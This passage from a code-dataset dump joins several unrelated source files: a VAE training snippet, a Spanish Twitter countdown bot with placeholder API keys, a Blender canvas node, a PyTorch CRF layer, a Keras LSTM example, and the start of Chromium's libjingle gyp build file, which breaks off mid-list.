    print(f'[*] Done: {len(training_set)} data points created')
    ## -- Train Classic VAE -- #
    print('\n[*] Training VAE')
    # Taken from vae_datagen
    from vae_basic import VecVAE, train_vae
    from sklearn import preprocessing
    raw_data = training_set
    scaler = preprocessing.StandardScaler().fit(raw_data) # zero mean unit standard deviation
    genomes = scaler.transform(raw_data)
    # 2-D latent space, 1000 training epochs.
    n_dim, n_latent, n_epochs = genomes.shape[1], 2, 1000
    vae = VecVAE(n_dim, n_latent)
    vae = train_vae(genomes, vae, n_epochs, view_mod=25)
    vae.save('dejong_vae.pt')
# Script entry point: build the dataset and train the VAE.
if __name__ == "__main__":
    main()
| 26.206612 | 93 | 0.568906 |
76eb4479782fb12f3d172e69146d8c65533dba89 | 2,413 | py | Python | my_christmas_bot.py | gastonginestet/christmas_bot | e90c01c8b1c91414560a6969125c98d8adaa28af | [
"MIT"
] | 1 | 2020-12-02T04:32:35.000Z | 2020-12-02T04:32:35.000Z | my_christmas_bot.py | gastonginestet/christmas_bot | e90c01c8b1c91414560a6969125c98d8adaa28af | [
"MIT"
] | null | null | null | my_christmas_bot.py | gastonginestet/christmas_bot | e90c01c8b1c91414560a6969125c98d8adaa28af | [
"MIT"
] | null | null | null | #! python
import tweepy
import time
import datetime
CONSUMER_KEY = 'your_consumer_key'
CONSUMER_SECRET = 'your_consumer_secret'
ACCESS_KEY = 'your_access_key :)'
ACCESS_SECRET = 'your_access_secret :O'
auth = tweepy.OAuthHandler(CONSUMER_KEY,CONSUMER_SECRET)
auth.set_access_token(ACCESS_KEY, ACCESS_SECRET)
api = tweepy.API(auth)
FILE_NAME = 'last_seen_id.txt'
def countdown_until_christmas(target=None):
    """Build the Spanish countdown message until `target`.

    :param target: datetime to count down to; defaults to the original
        hard-coded Christmas Eve dinner (2020-12-24 21:00) for backward
        compatibility.
    :return: message like 'Para Nochebuena falta 2 dias, 3 horas, 4 minutos.'

    Bug fix: hours and minutes are now the remainder after whole days and
    hours. The old code reported cumulative totals, e.g. two days out it
    said '2 dias, 48 horas, 2880 minutos'.
    """
    if target is None:
        target = datetime.datetime(2020, 12, 24, 21, 0, 0)
    present = datetime.datetime.now()
    difference = target - present
    days = difference.days
    # timedelta normalizes: .seconds is the sub-day remainder (0..86399).
    hours, rem = divmod(difference.seconds, 3600)
    minutes = rem // 60
    message = ('Para Nochebuena falta ' + str(int(days)) + ' dias, '
               + str(int(hours)) + ' horas, ' + str(int(minutes)) + ' minutos.')
    return message
# Print the current countdown once at startup as a smoke check.
message=str(countdown_until_christmas())
print(message)
def retrieve_last_seen_id(file_name):
    """Read the last processed tweet id (an int) from `file_name`.

    :raises ValueError: if the file content is not an integer.
    :raises OSError: if the file cannot be opened.
    """
    # `with` guarantees the handle is closed even if int() raises,
    # unlike the previous manual open/close pair.
    with open(file_name, 'r') as f_read:
        return int(f_read.read().strip())
def store_last_seen_id(last_seen_id, file_name):
    """Persist `last_seen_id` to `file_name`, overwriting previous content."""
    # `with` guarantees the handle is flushed and closed on all paths.
    with open(file_name, 'w') as f_write:
        f_write.write(str(last_seen_id))
    return
def retrieve_actual_date(file_name):
    """Read an integer value from `file_name`.

    NOTE(review): byte-for-byte duplicate of retrieve_last_seen_id and it is
    never called below — consider removing it or delegating to that helper.
    """
    # `with` guarantees the handle is closed even if int() raises.
    with open(file_name, 'r') as f_read:
        return int(f_read.read().strip())
def store_actual_date(last_seen_id, file_name):
    """Persist `last_seen_id` to `file_name`, overwriting previous content.

    NOTE(review): duplicate of store_last_seen_id and never called below —
    consider removing it or delegating to that helper.
    """
    with open(file_name, 'w') as f_write:
        f_write.write(str(last_seen_id))
    return
def reply_totweets():
    """Fetch mentions newer than the stored id and reply to countdown requests.

    For every new mention the id is persisted immediately (so a crash does
    not re-process old tweets); mentions containing '#cuantofalta' get a
    reply with the current countdown message.
    """
    print('Retrieving and replying to tweets...')
    last_seen_id = retrieve_last_seen_id(FILE_NAME)
    # use 1189312810599243777  # NOTE(review): looks like a sample tweet id
    # kept around for manual testing — confirm before removing.
    mentions = api.mentions_timeline(
        last_seen_id,
        tweet_mode='extended')
    # Oldest first, so the persisted id always moves forward.
    for mention in reversed(mentions):
        print(mention.user.screen_name + ' - ' + mention.full_text)
        print(mention.created_at)
        print(mention.id)
        print(' ')
        last_seen_id = mention.id
        store_last_seen_id(last_seen_id, FILE_NAME)
        if '#cuantofalta' in mention.full_text.lower():
            print('found #cuantofalta!')
            print('responding back...')
            message=str(countdown_until_christmas())
            print(mention.id)
            # Reply in-thread: second positional arg is in_reply_to_status_id.
            api.update_status('@'+ mention.user.screen_name + ' Hola ' +mention.user.name +'!! '+ message, mention.id )
# Poll for new mentions forever, pausing 10 seconds between passes.
while True:
    reply_totweets()
    time.sleep(10)
| 29.426829 | 141 | 0.668877 |
43f2ba32e0833f6f4f10d9baae6b60c81b694863 | 647 | py | Python | blender/arm/logicnode/canvas_get_location.py | Sanva/armory | 61b2d008e3b73bd978966b3209b646d162923e18 | [
"Zlib"
] | null | null | null | blender/arm/logicnode/canvas_get_location.py | Sanva/armory | 61b2d008e3b73bd978966b3209b646d162923e18 | [
"Zlib"
] | null | null | null | blender/arm/logicnode/canvas_get_location.py | Sanva/armory | 61b2d008e3b73bd978966b3209b646d162923e18 | [
"Zlib"
] | null | null | null | import bpy
from bpy.props import *
from bpy.types import Node, NodeSocket
from arm.logicnode.arm_nodes import *
class CanvasGetLocationNode(Node, ArmLogicTreeNode):
    '''Get canvas element location'''
    # Blender node identity; bl_idname must stay stable for saved scenes.
    bl_idname = 'LNCanvasGetLocationNode'
    bl_label = 'Canvas Get Location'
    bl_icon = 'NONE'

    def init(self, context):
        # Socket creation order defines the node's pin layout in Blender:
        # inputs: action trigger + target element name;
        # outputs: pass-through action + the element's X/Y coordinates.
        self.inputs.new('ArmNodeSocketAction', 'In')
        self.inputs.new('NodeSocketString', 'Element')
        self.outputs.new('ArmNodeSocketAction', 'Out')
        self.outputs.new('NodeSocketFloat', 'X')
        self.outputs.new('NodeSocketFloat', 'Y')
# Register the node under the 'Canvas' category of the Armory node menu.
add_node(CanvasGetLocationNode, category='Canvas')
| 32.35 | 54 | 0.703246 |
cc4b16cc80ed29530fcd59249b5ea55352490468 | 4,527 | py | Python | nlplingo/oregon/event_models/uoregon/layers/crf.py | BBN-E/nlplingo | 32ff17b1320937faa3d3ebe727032f4b3e7a353d | [
"Apache-2.0"
] | 3 | 2020-10-22T13:28:00.000Z | 2022-03-24T19:57:22.000Z | nlplingo/oregon/event_models/uoregon/layers/crf.py | BBN-E/nlplingo | 32ff17b1320937faa3d3ebe727032f4b3e7a353d | [
"Apache-2.0"
] | null | null | null | nlplingo/oregon/event_models/uoregon/layers/crf.py | BBN-E/nlplingo | 32ff17b1320937faa3d3ebe727032f4b3e7a353d | [
"Apache-2.0"
] | 1 | 2020-10-22T13:29:51.000Z | 2020-10-22T13:29:51.000Z | import torch.nn as nn
import torch
class CRF(nn.Module):
    """Linear-chain CRF layer with forward, gold-score and Viterbi decoding.

    `tag_map` must contain the special tags "<SOS>", "<EOS>" and "<PAD>";
    `opt['device']` selects the device for internally created tensors.
    """

    def __init__(self, tag_map, opt):
        super().__init__()
        self.opt = opt
        self.tag_map = tag_map
        self.num_tags = len(tag_map)
        # matrix of transition scores from j to i
        self.trans = nn.Parameter(torch.randn(self.num_tags, self.num_tags))
        # Forbid impossible transitions by pinning them to a large negative
        # score (acts as -inf in log space).
        self.trans.data[tag_map["<SOS>"], :] = -10000 # no transition to SOS
        self.trans.data[:, tag_map["<EOS>"]] = -10000 # no transition from EOS except to PAD
        self.trans.data[:, tag_map["<PAD>"]] = -10000 # no transition from PAD except to PAD
        self.trans.data[tag_map["<PAD>"], :] = -10000 # no transition to PAD except from EOS
        self.trans.data[tag_map["<PAD>"], tag_map["<EOS>"]] = 0
        self.trans.data[tag_map["<PAD>"], tag_map["<PAD>"]] = 0

    def forward(self, h, mask): # forward algorithm
        """Compute the log partition function for emissions `h` [B, T, C]
        under padding mask `mask` [B, T]; returns a [B] tensor."""
        # initialize forward variables in log space
        batch_size, _, _ = h.shape
        score = torch.Tensor(batch_size, self.num_tags).fill_(-10000).to(self.opt['device']) # [B, C]
        score[:, self.tag_map["<SOS>"]] = 0.
        trans = self.trans.unsqueeze(0) # [1, C, C]
        for t in range(h.size(1)): # recursion through the sequence
            mask_t = mask[:, t].unsqueeze(1)
            emit_t = h[:, t].unsqueeze(2) # [B, C, 1]
            score_t = score.unsqueeze(1) + emit_t + trans # [B, 1, C] -> [B, C, C]
            score_t = log_sum_exp(score_t) # [B, C, C] -> [B, C]
            # Masked (padded) positions keep their previous score unchanged.
            score = score_t * mask_t + score * (1 - mask_t)
        score = log_sum_exp(score + self.trans[self.tag_map["<EOS>"]])
        return score # partition function

    def score(self, h, y0, mask): # calculate the score of a given sequence
        """Score the gold tag sequence `y0` (offset by one: y0[t+1] is the
        tag at time t, y0[0] being <SOS>) against emissions `h` [B, T, C]."""
        batch_size, _, _ = h.shape
        score = torch.Tensor(batch_size).fill_(0.).to(self.opt['device'])
        h = h.unsqueeze(3)
        trans = self.trans.unsqueeze(2)
        for t in range(h.size(1)): # recursion through the sequence
            mask_t = mask[:, t]
            # Per-batch emission score of the gold tag at step t, and the
            # transition score from the previous gold tag.
            emit_t = torch.cat([h[t, y0[t + 1]] for h, y0 in zip(h, y0)])
            trans_t = torch.cat([trans[y0[t + 1], y0[t]] for y0 in y0])
            score += (emit_t + trans_t) * mask_t
        # Add the transition from each sequence's last real tag to <EOS>.
        last_tag = y0.gather(1, mask.sum(1).long().unsqueeze(1)).squeeze(1)
        score += self.trans[self.tag_map["<EOS>"], last_tag]
        return score

    def decode(self, h, mask): # Viterbi decoding
        """Return the best tag path per sequence as a [B, T] long tensor,
        padded with <PAD> beyond each sequence's true length."""
        # initialize backpointers and viterbi variables in log space
        batch_size, seq_len, _ = h.shape
        bptr = torch.Tensor().long().to(self.opt['device'])
        score = torch.Tensor(batch_size, self.num_tags).fill_(-10000).to(self.opt['device'])
        score[:, self.tag_map["<SOS>"]] = 0.
        for t in range(h.size(1)): # recursion through the sequence
            mask_t = mask[:, t].unsqueeze(1)
            score_t = score.unsqueeze(1) + self.trans # [B, 1, C] -> [B, C, C]
            score_t, bptr_t = score_t.max(2) # best previous scores and tags
            score_t += h[:, t] # plus emission scores
            bptr = torch.cat((bptr, bptr_t.unsqueeze(1)), 1)
            score = score_t * mask_t + score * (1 - mask_t)
        score += self.trans[self.tag_map["<EOS>"]]
        best_score, best_tag = torch.max(score, 1)
        # back-tracking
        bptr = bptr.tolist()
        best_path = [[i] for i in best_tag.tolist()]
        for b in range(batch_size):
            i = best_tag[b] # best tag
            j = int(mask[b].sum().item())
            for bptr_t in reversed(bptr[b][:j]):
                i = bptr_t[i]
                best_path[b].append(i)
            # Drop the <SOS> entry and restore chronological order.
            best_path[b].pop()
            best_path[b].reverse()
        padded_path = []
        for b in range(batch_size):
            padded_path.append(
                best_path[b] + [self.tag_map["<PAD>"]] * (seq_len - len(best_path[b]))
            )
        padded_path = torch.Tensor(padded_path).long().to(self.opt['device'])
        return padded_path
def preds_to_tags(batch_preds, mask, tag_map):
    '''Map predicted tag-id sequences back to tag strings.

    batch_preds.shape = [batch size, seq len]; mask.shape = [batch size,
    seq len] with 1 marking real tokens. Returns a list (one entry per
    sequence) of tag-name lists truncated to each sequence's true length.

    Fix: the original version built `tags` and sliced `preds` but never
    appended or returned anything, so it always returned None.
    '''
    inverse_map = dict([(v, k) for k, v in tag_map.items()])
    lengths = torch.sum(mask, dim=-1).data.cpu().numpy()
    batch_size, seq_len = batch_preds.shape
    batch_preds = batch_preds.data.cpu().numpy()
    tags = []
    for b_id in range(batch_size):
        preds = batch_preds[b_id][:lengths[b_id]]
        tags.append([inverse_map[int(p)] for p in preds])
    return tags
def log_sum_exp(x):
    """Numerically stable log-sum-exp over the last dimension of `x`.

    Equivalent to the previous hand-rolled max-shift implementation, but
    delegates to the library primitive.
    """
    return torch.logsumexp(x, dim=-1)
| 44.382353 | 102 | 0.567263 |
54e1a17ba3c3233970cb4c4404275f5d2aebf831 | 454 | py | Python | Chapter 3/rnn_example.py | PacktPublishing/Machine-Learning-Model-Serving-Patterns-and-Best-Practices | 390ae5868e023f0e417f5dca23eab69e848c5f91 | [
"MIT"
] | null | null | null | Chapter 3/rnn_example.py | PacktPublishing/Machine-Learning-Model-Serving-Patterns-and-Best-Practices | 390ae5868e023f0e417f5dca23eab69e848c5f91 | [
"MIT"
] | null | null | null | Chapter 3/rnn_example.py | PacktPublishing/Machine-Learning-Model-Serving-Patterns-and-Best-Practices | 390ae5868e023f0e417f5dca23eab69e848c5f91 | [
"MIT"
] | null | null | null | import numpy as np
import tensorflow as tf
from tensorflow import keras
from tensorflow.keras import layers
# Build a minimal sequence model: embedding -> LSTM -> linear head.
model = keras.Sequential()
# Add an Embedding layer expecting input vocab of size 1000, and
# output embedding dimension of size 64.
model.add(layers.Embedding(input_dim=1000, output_dim=64))
# Add a LSTM layer with 128 internal units.
model.add(layers.LSTM(128))
# Add a Dense layer with 10 units (no activation: raw logits).
model.add(layers.Dense(10))
model.summary() | 26.705882 | 64 | 0.779736 |
1051fb1e31c8ce082760a089204cd3e4a850eb14 | 42,593 | gyp | Python | src/third_party/libjingle/libjingle.gyp | jxjnjjn/chromium | 435c1d02fd1b99001dc9e1e831632c894523580d | [
"Apache-2.0"
] | 9 | 2018-09-21T05:36:12.000Z | 2021-11-15T15:14:36.000Z | src/third_party/libjingle/libjingle.gyp | jxjnjjn/chromium | 435c1d02fd1b99001dc9e1e831632c894523580d | [
"Apache-2.0"
] | null | null | null | src/third_party/libjingle/libjingle.gyp | jxjnjjn/chromium | 435c1d02fd1b99001dc9e1e831632c894523580d | [
"Apache-2.0"
] | 3 | 2018-11-28T14:54:13.000Z | 2020-07-02T07:36:07.000Z | # Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
{
'includes': [
'../../build/win_precompile.gypi',
],
'variables': {
'enabled_libjingle_device_manager%': 0,
'libjingle_additional_deps%': [],
'libjingle_peerconnection_additional_deps%': [],
'libjingle_source%': "source",
'libpeer_target_type%': 'static_library',
'libpeer_allocator_shim%': 0,
},
'target_defaults': {
'defines': [
'EXPAT_RELATIVE_PATH',
'FEATURE_ENABLE_SSL',
'GTEST_RELATIVE_PATH',
'HAVE_SRTP',
'HAVE_WEBRTC_VIDEO',
'HAVE_WEBRTC_VOICE',
'JSONCPP_RELATIVE_PATH',
'LOGGING_INSIDE_LIBJINGLE',
'NO_MAIN_THREAD_WRAPPING',
'NO_SOUND_SYSTEM',
'SRTP_RELATIVE_PATH',
'USE_WEBRTC_DEV_BRANCH',
],
'configurations': {
'Debug': {
'defines': [
# TODO(sergeyu): Fix libjingle to use NDEBUG instead of
# _DEBUG and remove this define. See below as well.
'_DEBUG',
],
}
},
'include_dirs': [
'./overrides',
'./<(libjingle_source)',
'../../testing/gtest/include',
'../../third_party',
'../../third_party/libyuv/include',
'../../third_party/webrtc',
],
'dependencies': [
'<(DEPTH)/base/base.gyp:base',
'<(DEPTH)/net/net.gyp:net',
'<(DEPTH)/third_party/expat/expat.gyp:expat',
],
'export_dependent_settings': [
'<(DEPTH)/third_party/expat/expat.gyp:expat',
],
'direct_dependent_settings': {
'include_dirs': [
'./overrides',
'./<(libjingle_source)',
'../../testing/gtest/include',
'../../third_party',
'../../third_party/webrtc',
],
'defines': [
'FEATURE_ENABLE_SSL',
'FEATURE_ENABLE_VOICEMAIL',
'EXPAT_RELATIVE_PATH',
'GTEST_RELATIVE_PATH',
'JSONCPP_RELATIVE_PATH',
'NO_MAIN_THREAD_WRAPPING',
'NO_SOUND_SYSTEM',
],
'conditions': [
['OS=="win"', {
'link_settings': {
'libraries': [
'-lsecur32.lib',
'-lcrypt32.lib',
'-liphlpapi.lib',
],
},
}],
['OS=="win"', {
'include_dirs': [
'../third_party/platformsdk_win7/files/Include',
],
'defines': [
'_CRT_SECURE_NO_WARNINGS', # Suppres warnings about _vsnprinf
],
# TODO(jschuh): crbug.com/167187 fix size_t to int truncations.
'msvs_disabled_warnings': [ 4267 ],
}],
['OS=="linux"', {
'defines': [
'LINUX',
],
}],
['OS=="mac"', {
'defines': [
'OSX',
],
}],
['OS=="android"', {
'defines': [
'ANDROID',
],
}],
['os_posix == 1', {
'defines': [
'POSIX',
],
}],
['os_bsd==1', {
'defines': [
'BSD',
],
}],
['OS=="openbsd"', {
'defines': [
'OPENBSD',
],
}],
['OS=="freebsd"', {
'defines': [
'FREEBSD',
],
}],
],
},
'all_dependent_settings': {
'configurations': {
'Debug': {
'defines': [
# TODO(sergeyu): Fix libjingle to use NDEBUG instead of
# _DEBUG and remove this define. See above as well.
'_DEBUG',
],
}
},
},
'conditions': [
['"<(libpeer_target_type)"=="static_library"', {
'defines': [ 'LIBPEERCONNECTION_LIB=1' ],
}],
['use_openssl==1', {
'defines': [
'SSL_USE_OPENSSL',
'HAVE_OPENSSL_SSL_H',
],
'dependencies': [
'../../third_party/openssl/openssl.gyp:openssl',
],
}, {
'defines': [
'SSL_USE_NSS',
'HAVE_NSS_SSL_H',
'SSL_USE_NSS_RNG',
],
'conditions': [
['os_posix == 1 and OS != "mac" and OS != "ios" and OS != "android"', {
'dependencies': [
'<(DEPTH)/build/linux/system.gyp:ssl',
],
}],
['OS == "mac" or OS == "ios" or OS == "win"', {
'dependencies': [
'<(DEPTH)/net/third_party/nss/ssl.gyp:libssl',
'<(DEPTH)/third_party/nss/nss.gyp:nspr',
'<(DEPTH)/third_party/nss/nss.gyp:nss',
],
}],
],
}],
['OS=="win"', {
'include_dirs': [
'../third_party/platformsdk_win7/files/Include',
],
'conditions' : [
['target_arch == "ia32"', {
'defines': [
'_USE_32BIT_TIME_T',
],
}],
],
}],
['clang == 1', {
'xcode_settings': {
'WARNING_CFLAGS!': [
# Don't warn about string->bool used in asserts.
'-Wstring-conversion',
],
},
'cflags!': [
'-Wstring-conversion',
],
}],
['OS=="linux"', {
'defines': [
'LINUX',
],
}],
['OS=="mac"', {
'defines': [
'OSX',
],
}],
['OS=="ios"', {
'defines': [
'IOS',
],
}],
['os_posix == 1', {
'defines': [
'POSIX',
],
}],
['os_bsd==1', {
'defines': [
'BSD',
],
}],
['OS=="openbsd"', {
'defines': [
'OPENBSD',
],
}],
['OS=="freebsd"', {
'defines': [
'FREEBSD',
],
}],
],
},
'targets': [
{
'target_name': 'libjingle',
'type': 'static_library',
'sources': [
'overrides/talk/base/basictypes.h',
'overrides/talk/base/constructormagic.h',
# Overrides logging.h/.cc because libjingle logging should be done to
# the same place as the chromium logging.
'overrides/talk/base/logging.cc',
'overrides/talk/base/logging.h',
'<(libjingle_source)/talk/base/asyncfile.cc',
'<(libjingle_source)/talk/base/asyncfile.h',
'<(libjingle_source)/talk/base/asynchttprequest.cc',
'<(libjingle_source)/talk/base/asynchttprequest.h',
'<(libjingle_source)/talk/base/asyncpacketsocket.h',
'<(libjingle_source)/talk/base/asyncsocket.cc',
'<(libjingle_source)/talk/base/asyncsocket.h',
'<(libjingle_source)/talk/base/asynctcpsocket.cc',
'<(libjingle_source)/talk/base/asynctcpsocket.h',
'<(libjingle_source)/talk/base/asyncudpsocket.cc',
'<(libjingle_source)/talk/base/asyncudpsocket.h',
'<(libjingle_source)/talk/base/autodetectproxy.cc',
'<(libjingle_source)/talk/base/autodetectproxy.h',
'<(libjingle_source)/talk/base/base64.cc',
'<(libjingle_source)/talk/base/base64.h',
'<(libjingle_source)/talk/base/basicdefs.h',
'<(libjingle_source)/talk/base/basicpacketsocketfactory.cc',
'<(libjingle_source)/talk/base/basicpacketsocketfactory.h',
'<(libjingle_source)/talk/base/bytebuffer.cc',
'<(libjingle_source)/talk/base/bytebuffer.h',
'<(libjingle_source)/talk/base/byteorder.h',
'<(libjingle_source)/talk/base/checks.cc',
'<(libjingle_source)/talk/base/checks.h',
'<(libjingle_source)/talk/base/common.cc',
'<(libjingle_source)/talk/base/common.h',
'<(libjingle_source)/talk/base/cpumonitor.cc',
'<(libjingle_source)/talk/base/cpumonitor.h',
'<(libjingle_source)/talk/base/crc32.cc',
'<(libjingle_source)/talk/base/crc32.h',
'<(libjingle_source)/talk/base/criticalsection.h',
'<(libjingle_source)/talk/base/cryptstring.h',
'<(libjingle_source)/talk/base/diskcache.cc',
'<(libjingle_source)/talk/base/diskcache.h',
'<(libjingle_source)/talk/base/event.cc',
'<(libjingle_source)/talk/base/event.h',
'<(libjingle_source)/talk/base/fileutils.cc',
'<(libjingle_source)/talk/base/fileutils.h',
'<(libjingle_source)/talk/base/firewallsocketserver.cc',
'<(libjingle_source)/talk/base/firewallsocketserver.h',
'<(libjingle_source)/talk/base/flags.cc',
'<(libjingle_source)/talk/base/flags.h',
'<(libjingle_source)/talk/base/helpers.cc',
'<(libjingle_source)/talk/base/helpers.h',
'<(libjingle_source)/talk/base/host.cc',
'<(libjingle_source)/talk/base/host.h',
'<(libjingle_source)/talk/base/httpbase.cc',
'<(libjingle_source)/talk/base/httpbase.h',
'<(libjingle_source)/talk/base/httpclient.cc',
'<(libjingle_source)/talk/base/httpclient.h',
'<(libjingle_source)/talk/base/httpcommon-inl.h',
'<(libjingle_source)/talk/base/httpcommon.cc',
'<(libjingle_source)/talk/base/httpcommon.h',
'<(libjingle_source)/talk/base/httprequest.cc',
'<(libjingle_source)/talk/base/httprequest.h',
'<(libjingle_source)/talk/base/ipaddress.cc',
'<(libjingle_source)/talk/base/ipaddress.h',
'<(libjingle_source)/talk/base/json.cc',
'<(libjingle_source)/talk/base/json.h',
'<(libjingle_source)/talk/base/linked_ptr.h',
'<(libjingle_source)/talk/base/md5.cc',
'<(libjingle_source)/talk/base/md5.h',
'<(libjingle_source)/talk/base/md5digest.h',
'<(libjingle_source)/talk/base/messagedigest.cc',
'<(libjingle_source)/talk/base/messagedigest.h',
'<(libjingle_source)/talk/base/messagehandler.cc',
'<(libjingle_source)/talk/base/messagehandler.h',
'<(libjingle_source)/talk/base/messagequeue.cc',
'<(libjingle_source)/talk/base/messagequeue.h',
'<(libjingle_source)/talk/base/nethelpers.cc',
'<(libjingle_source)/talk/base/nethelpers.h',
'<(libjingle_source)/talk/base/network.cc',
'<(libjingle_source)/talk/base/network.h',
'<(libjingle_source)/talk/base/nssidentity.cc',
'<(libjingle_source)/talk/base/nssidentity.h',
'<(libjingle_source)/talk/base/nssstreamadapter.cc',
'<(libjingle_source)/talk/base/nssstreamadapter.h',
'<(libjingle_source)/talk/base/nullsocketserver.h',
'<(libjingle_source)/talk/base/pathutils.cc',
'<(libjingle_source)/talk/base/pathutils.h',
'<(libjingle_source)/talk/base/physicalsocketserver.cc',
'<(libjingle_source)/talk/base/physicalsocketserver.h',
'<(libjingle_source)/talk/base/proxydetect.cc',
'<(libjingle_source)/talk/base/proxydetect.h',
'<(libjingle_source)/talk/base/proxyinfo.cc',
'<(libjingle_source)/talk/base/proxyinfo.h',
'<(libjingle_source)/talk/base/ratelimiter.cc',
'<(libjingle_source)/talk/base/ratelimiter.h',
'<(libjingle_source)/talk/base/ratetracker.cc',
'<(libjingle_source)/talk/base/ratetracker.h',
'<(libjingle_source)/talk/base/scoped_ptr.h',
'<(libjingle_source)/talk/base/sec_buffer.h',
'<(libjingle_source)/talk/base/sha1.cc',
'<(libjingle_source)/talk/base/sha1.h',
'<(libjingle_source)/talk/base/sha1digest.h',
'<(libjingle_source)/talk/base/signalthread.cc',
'<(libjingle_source)/talk/base/signalthread.h',
'<(libjingle_source)/talk/base/sigslot.h',
'<(libjingle_source)/talk/base/sigslotrepeater.h',
'<(libjingle_source)/talk/base/socket.h',
'<(libjingle_source)/talk/base/socketadapters.cc',
'<(libjingle_source)/talk/base/socketadapters.h',
'<(libjingle_source)/talk/base/socketaddress.cc',
'<(libjingle_source)/talk/base/socketaddress.h',
'<(libjingle_source)/talk/base/socketaddresspair.cc',
'<(libjingle_source)/talk/base/socketaddresspair.h',
'<(libjingle_source)/talk/base/socketfactory.h',
'<(libjingle_source)/talk/base/socketpool.cc',
'<(libjingle_source)/talk/base/socketpool.h',
'<(libjingle_source)/talk/base/socketserver.h',
'<(libjingle_source)/talk/base/socketstream.cc',
'<(libjingle_source)/talk/base/socketstream.h',
'<(libjingle_source)/talk/base/ssladapter.cc',
'<(libjingle_source)/talk/base/ssladapter.h',
'<(libjingle_source)/talk/base/sslidentity.cc',
'<(libjingle_source)/talk/base/sslidentity.h',
'<(libjingle_source)/talk/base/sslsocketfactory.cc',
'<(libjingle_source)/talk/base/sslsocketfactory.h',
'<(libjingle_source)/talk/base/sslstreamadapter.cc',
'<(libjingle_source)/talk/base/sslstreamadapter.h',
'<(libjingle_source)/talk/base/sslstreamadapterhelper.cc',
'<(libjingle_source)/talk/base/sslstreamadapterhelper.h',
'<(libjingle_source)/talk/base/stream.cc',
'<(libjingle_source)/talk/base/stream.h',
'<(libjingle_source)/talk/base/stringencode.cc',
'<(libjingle_source)/talk/base/stringencode.h',
'<(libjingle_source)/talk/base/stringutils.cc',
'<(libjingle_source)/talk/base/stringutils.h',
'<(libjingle_source)/talk/base/systeminfo.cc',
'<(libjingle_source)/talk/base/systeminfo.h',
'<(libjingle_source)/talk/base/task.cc',
'<(libjingle_source)/talk/base/task.h',
'<(libjingle_source)/talk/base/taskparent.cc',
'<(libjingle_source)/talk/base/taskparent.h',
'<(libjingle_source)/talk/base/taskrunner.cc',
'<(libjingle_source)/talk/base/taskrunner.h',
'<(libjingle_source)/talk/base/thread.cc',
'<(libjingle_source)/talk/base/thread.h',
'<(libjingle_source)/talk/base/timeutils.cc',
'<(libjingle_source)/talk/base/timeutils.h',
'<(libjingle_source)/talk/base/timing.cc',
'<(libjingle_source)/talk/base/timing.h',
'<(libjingle_source)/talk/base/urlencode.cc',
'<(libjingle_source)/talk/base/urlencode.h',
'<(libjingle_source)/talk/base/worker.cc',
'<(libjingle_source)/talk/base/worker.h',
'<(libjingle_source)/talk/p2p/base/candidate.h',
'<(libjingle_source)/talk/p2p/base/common.h',
'<(libjingle_source)/talk/p2p/base/dtlstransport.h',
'<(libjingle_source)/talk/p2p/base/dtlstransportchannel.cc',
'<(libjingle_source)/talk/p2p/base/dtlstransportchannel.h',
'<(libjingle_source)/talk/p2p/base/p2ptransport.cc',
'<(libjingle_source)/talk/p2p/base/p2ptransport.h',
'<(libjingle_source)/talk/p2p/base/p2ptransportchannel.cc',
'<(libjingle_source)/talk/p2p/base/p2ptransportchannel.h',
'<(libjingle_source)/talk/p2p/base/parsing.cc',
'<(libjingle_source)/talk/p2p/base/parsing.h',
'<(libjingle_source)/talk/p2p/base/port.cc',
'<(libjingle_source)/talk/p2p/base/port.h',
'<(libjingle_source)/talk/p2p/base/portallocator.cc',
'<(libjingle_source)/talk/p2p/base/portallocator.h',
'<(libjingle_source)/talk/p2p/base/portallocatorsessionproxy.cc',
'<(libjingle_source)/talk/p2p/base/portallocatorsessionproxy.h',
'<(libjingle_source)/talk/p2p/base/portproxy.cc',
'<(libjingle_source)/talk/p2p/base/portproxy.h',
'<(libjingle_source)/talk/p2p/base/pseudotcp.cc',
'<(libjingle_source)/talk/p2p/base/pseudotcp.h',
'<(libjingle_source)/talk/p2p/base/rawtransport.cc',
'<(libjingle_source)/talk/p2p/base/rawtransport.h',
'<(libjingle_source)/talk/p2p/base/rawtransportchannel.cc',
'<(libjingle_source)/talk/p2p/base/rawtransportchannel.h',
'<(libjingle_source)/talk/p2p/base/relayport.cc',
'<(libjingle_source)/talk/p2p/base/relayport.h',
'<(libjingle_source)/talk/p2p/base/session.cc',
'<(libjingle_source)/talk/p2p/base/session.h',
'<(libjingle_source)/talk/p2p/base/sessionclient.h',
'<(libjingle_source)/talk/p2p/base/sessiondescription.cc',
'<(libjingle_source)/talk/p2p/base/sessiondescription.h',
'<(libjingle_source)/talk/p2p/base/sessionid.h',
'<(libjingle_source)/talk/p2p/base/sessionmanager.cc',
'<(libjingle_source)/talk/p2p/base/sessionmanager.h',
'<(libjingle_source)/talk/p2p/base/sessionmessages.cc',
'<(libjingle_source)/talk/p2p/base/sessionmessages.h',
'<(libjingle_source)/talk/p2p/base/stun.cc',
'<(libjingle_source)/talk/p2p/base/stun.h',
'<(libjingle_source)/talk/p2p/base/stunport.cc',
'<(libjingle_source)/talk/p2p/base/stunport.h',
'<(libjingle_source)/talk/p2p/base/stunrequest.cc',
'<(libjingle_source)/talk/p2p/base/stunrequest.h',
'<(libjingle_source)/talk/p2p/base/tcpport.cc',
'<(libjingle_source)/talk/p2p/base/tcpport.h',
'<(libjingle_source)/talk/p2p/base/transport.cc',
'<(libjingle_source)/talk/p2p/base/transport.h',
'<(libjingle_source)/talk/p2p/base/transportchannel.cc',
'<(libjingle_source)/talk/p2p/base/transportchannel.h',
'<(libjingle_source)/talk/p2p/base/transportchannelimpl.h',
'<(libjingle_source)/talk/p2p/base/transportchannelproxy.cc',
'<(libjingle_source)/talk/p2p/base/transportchannelproxy.h',
'<(libjingle_source)/talk/p2p/base/transportdescriptionfactory.cc',
'<(libjingle_source)/talk/p2p/base/transportdescriptionfactory.h',
'<(libjingle_source)/talk/p2p/base/turnport.cc',
'<(libjingle_source)/talk/p2p/base/turnport.h',
'<(libjingle_source)/talk/p2p/client/basicportallocator.cc',
'<(libjingle_source)/talk/p2p/client/basicportallocator.h',
'<(libjingle_source)/talk/p2p/client/httpportallocator.cc',
'<(libjingle_source)/talk/p2p/client/httpportallocator.h',
'<(libjingle_source)/talk/p2p/client/sessionmanagertask.h',
'<(libjingle_source)/talk/p2p/client/sessionsendtask.h',
'<(libjingle_source)/talk/p2p/client/socketmonitor.cc',
